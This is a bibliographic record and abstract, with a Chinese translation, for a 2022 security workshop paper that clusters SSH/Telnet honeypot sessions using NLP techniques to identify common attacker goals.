Matteo Boffa, Giulia Milan, L. Vassio, I. Drago, M. Mellia, Zied Ben-Houidi
{"title":"Towards NLP-based Processing of Honeypot Logs","authors":"Matteo Boffa, Giulia Milan, L. Vassio, I. Drago, M. Mellia, Zied Ben-Houidi","doi":"10.1109/eurospw55150.2022.00038","DOIUrl":null,"url":null,"abstract":"Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200000 sessions, including 61000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.","PeriodicalId":275840,"journal":{"name":"2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)","volume":"19 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2022-06-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"8","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1109/eurospw55150.2022.00038","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}
引用次数: 8
Abstract
Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200000 sessions, including 61000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.
蜜罐是用于获取攻击信息的主动传感器。在寻找漏洞的过程中,攻击者会生成大量日志,对这些日志的分析既耗时又繁琐。我们在此评估自然语言处理(NLP)方法是否可以提供有意义的表征来发现攻击者活动中的共同特征。我们考虑一个广泛使用的SSH/Telnet蜜罐来记录超过200000个会话,包括61000个独特的shell脚本,其中一些包含超过100个Bash命令的序列。我们首先解析会话以分离Bash命令、选项和参数。接下来,我们将每个会话投影到一个度量空间中,相对于NLP中使用的两种常用工具:Bag of Words和Word2Vec。最后,我们利用聚类算法来聚合会话,同时提供聚类过程的工具表示。最后,我们得到了几十个集群,通过分析来解释攻击者的目的,即获取系统信息、注入恶意账户、下载并运行可执行文件等。我们的工作是朝着自动识别蜜罐上的攻击模式迈出的第一步,从而有效地支持安全活动。